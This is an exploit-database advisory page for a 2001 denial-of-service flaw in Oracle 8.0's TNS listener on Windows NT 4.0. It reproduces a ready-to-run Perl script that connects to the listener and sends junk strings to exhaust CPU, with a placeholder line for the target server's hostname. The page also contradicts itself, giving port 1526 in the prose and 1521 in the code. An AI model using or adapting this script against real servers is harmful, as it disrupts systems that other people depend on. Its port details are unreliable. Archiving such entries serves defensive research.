Denial of Service Vulnerability in Oracle 8

vendor:

Oracle 8.0

by:

r0ot@runbox.com

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Oracle 8.0

Affected Version From: Oracle 8.0

Affected Version To: Oracle 8.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows NT 4.0 (Sp6)

2001

Denial of Service Vulnerability in Oracle 8

An attacker connecting to port 1526 and sending invalid input will cause the 'TNSLSNR80.EXE' process to consume all available system resources, causing the server to stop responding. A Perl script is provided which can be used to crash Oracle 8.0 on Windows NT 4.0 (Sp6).

Mitigation:

Ensure that the Oracle server is not exposed to the public internet and that access is restricted to trusted users.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2626/info

A denial of service vulnerability exists in Oracle 8. An attacker connecting to port 1526 and sending invalid input will cause the 'TNSLSNR80.EXE' process to consume all available system resources, causing the server to stop responding.

#!/usr/local/bin/perl -w

# This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
# TNSLSNR80.EXE will consume 100% CPU...
#
# by r0ot@runbox.com

use IO::Socket;

$host="kickme";
# enter the hostname of the oracle-server to kick

socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);

sleep(2);
print HANDLE "\n";
for ($i=0; $i<3; $i++) {
        sleep(2);
        print HANDLE "dfsdffdfsfdggfdgdf";
        # an arbitrary, but carefully chosen constant...
}

close(HANDLE);